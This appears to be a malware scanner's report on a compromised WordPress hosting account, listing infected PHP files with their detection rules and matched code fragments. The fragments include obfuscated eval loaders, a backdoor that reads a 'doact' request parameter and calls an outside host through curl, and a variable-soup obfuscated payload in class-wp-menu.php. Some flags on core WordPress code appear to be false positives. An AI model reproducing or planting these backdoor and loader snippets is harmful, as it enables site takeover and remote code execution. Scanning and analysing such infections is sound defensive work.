/custdata02/turtle/etc/turtlesys.net/shawndee/input.php Size: 1.49 kB Created: 2023-09-26 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/etc/turtlesys.net/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/etc/shawndees.com/@pwcache/admin.php Size: 1.49 kB Created: 2023-04-03 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/etc/shawndees.com/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/MuseExport/css/input.php Size: 1.49 kB Created: 2023-03-29 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/imp/MuseExport/index.php Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/imp/MuseExport/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/_db_backups/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/cgi/index.php Size: 15.44 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Warns: 2 Dangers: 11
| Description | Match |
|---|
Exploit base64_long Line: 8 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 7 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Function eval Line: 9 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/imp/cgi/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/stats/input.php Size: 1.49 kB Created: 2023-05-21 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/imp/stats/index.php Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/imp/stats/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/wp-admin/includes/class-pclzip.php Size: 191.03 kB Created: 2013-07-10 03:15:42 Modified: 2019-03-09 07:39:57 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2622 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2775 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3697 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3943 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5672 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/imp/wp-admin/includes/ms.php Size: 26.62 kB Created: 2013-07-10 03:15:33 Modified: 2019-03-09 07:39:58 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 432 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php riny
|
|
/custdata02/turtle/imp/wp-admin/includes/class-wp-filesystem-direct.php Size: 9.33 kB Created: 2013-07-10 03:15:39 Modified: 2019-03-09 07:39:57 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid($owneruid); return $ownerarray['name']; } function getchmod($file) { return substr(decoct(@fileperms($file)),3); } function group($file) { $gid = @filegroup($file); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $this->exists($destination) ) return false; $rtval = copy($source, $destina...
|
|
/custdata02/turtle/imp/wp-admin/includes/class-wp-filesystem-ssh2.php Size: 11.17 kB Created: 2013-07-10 03:15:39 Modified: 2019-03-09 07:39:57 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid($owneruid); return $ownerarray['name']; } function getchmod($file) { return substr(decoct(@fileperms( 'ssh2.sftp://' . $this->sftp_link . '/' . ltrim($file, '/') )),3); } function group($file) { $gid = @filegroup('ssh2.sftp://' . $this->sftp_link . '/' . ltrim($file, '/')); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } function copy($source, $destination, $overwrite = false, $mo...
|
|
/custdata02/turtle/imp/wp-admin/includes/class-wp-menu.php Size: 4.63 kB Created: 2013-07-10 03:15:38 Modified: 2019-03-09 07:39:57 Dangers: 10
| Description | Match |
|---|
Sign 0d717969 Line: 3 Dangerous Malware Signature (hash: 0d717969) | <?php $catbird= ',';$clam ='a'; $lab ='T';
$darlings= 'H'; $emmeline='(';$inspector= 'f';$homebuild= 'a'; $epochs='sP_aT'; $cataract= '8U"=;TEE';$glories = 'd'; $distress= ')';$inquiries = 's';$arlen= 'a';$garter ='ery$(5`o'; $instrumented = ']i) vso"e';
$bernadina ='A)_5l'; $gastrointestinal ='d';$balls ='D'; $dissertation= 'R';$flattening ='g$_iaa'; $ariella=';'; $consulate ='"5ta$5aI'; $cello ='F';$beguiles ='[CE:dn';
$helyn='"'; $inveigh = 'Q';$laughably= '_';$deliberator = 'iba5';$burntness= '...
| Sign 84abfe10 Line: 20 Dangerous Malware Signature (hash: 84abfe10) | <?php $backups . $astronaut.$magna['4']. $magna['1'].$lazybones['1']. $magna['4'] .$magna['6'] . $dime['4']. $lyda.
$box['5'].$backups .$lazybones['1'] .$dime['7'] .$brennan['6'].
| Sign 84abfe10 Line: 21 Dangerous Malware Signature (hash: 84abfe10) | <?php $magna['4']. $exterminates['6'].$magna['1'].
$brennan['2'] .$lazybones['5']. $magna['1']. $astronaut. $astronaut.$magna['1'].$demystify. $magna['6'] .$magna['5'].$brennan['6'] .
$magna['5'] . $lazybones['5'] .$dime['4'] .$lyda.$box['5'] . $backups .$magna['6'] .
| Sign 84abfe10 Line: 24 Dangerous Malware Signature (hash: 84abfe10) | <?php $enclosure['5'] .
$magna['4'].$lazybones['1'] .
$magna['6'] .$magna['1'].$astronaut .
$enclosure['5'] . $jingled['3'] .$lazybones['5'].$idled['0']. $idled['0'] .
$idled['0'] .
| Sign 84abfe10 Line: 29 Dangerous Malware Signature (hash: 84abfe10) | <?php $lasts['1'] . $dime['7'].$brennan['0'] .
$magna['1']. $astronaut . $astronaut. $magna['1'].
$demystify. $magna['6']. $magna['3'] . $magna['4'].
$astronaut. $enclosure['5'] .$magna['4'].$lazybones['5'].
$lasts['1'].$magna['6'] .$germ . $magna['0'] .
$bloodstained['4'].
| Sign 84abfe10 Line: 39 Dangerous Malware Signature (hash: 84abfe10) | <?php $magna['0'].$germ .
$jingled['4'].$magna['0']. $germ . $idled['0'] . $exterminates['1']. $lasts['1']. $magna['1'] .
$brennan['0'] .
$dime['7'].$jingled['3']. $jingled['3'].
$magna['4'] . $lazybones['1'] . $lazybones['5'] .$lasts['1'].$dime['7'].$evenhandedness['1']. $handles['3'] .
| Sign 84abfe10 Line: 47 Dangerous Malware Signature (hash: 84abfe10) | <?php $handles['3'] .$dime['2'] .$idled['0'] .$enclosure['0'] .
$lasts['1'] .$dime['7']. $evenhandedness['1']. $handles['3'] . $dime['4'] .$enclosure['4'] .$magna['1']. $backups . $magna['4'] . $magna['7'] . $gaseously .
$magna['7'] .
| Sign 84abfe10 Line: 50 Dangerous Malware Signature (hash: 84abfe10) | <?php $handles['3'].
$dime['2']. $dime['8']. $lazybones['5'] . $dime['7'] .
$jingled['3'] .
$jingled['3'].$magna['4'].$lazybones['1'].$lazybones['5']. $lasts['1']. $dime['7'] .$evenhandedness['1'] . $handles['3'].
$handles['0'] . $lasts['2']. $lasts['2'] .
$box['2'].$magna['6']. $brantley.
| Sign 84abfe10 Line: 61 Dangerous Malware Signature (hash: 84abfe10) | <?php $magna['0']. $magna['7'] . $gaseously .$magna['7'] .$learned['3']. $learned['3'] .
$handles['3'] . $dime['2'] . $idled['0'].
$enclosure['0'] .$lasts['1'].$dime['7'] .$evenhandedness['1'] .
$handles['3'].
$handles['0'].$lasts['2'].$lasts['2'] . $box['2'] .$magna['6'] .$brantley.
| Sign 84abfe10 Line: 73 Dangerous Malware Signature (hash: 84abfe10) | <?php $dime['7'] .
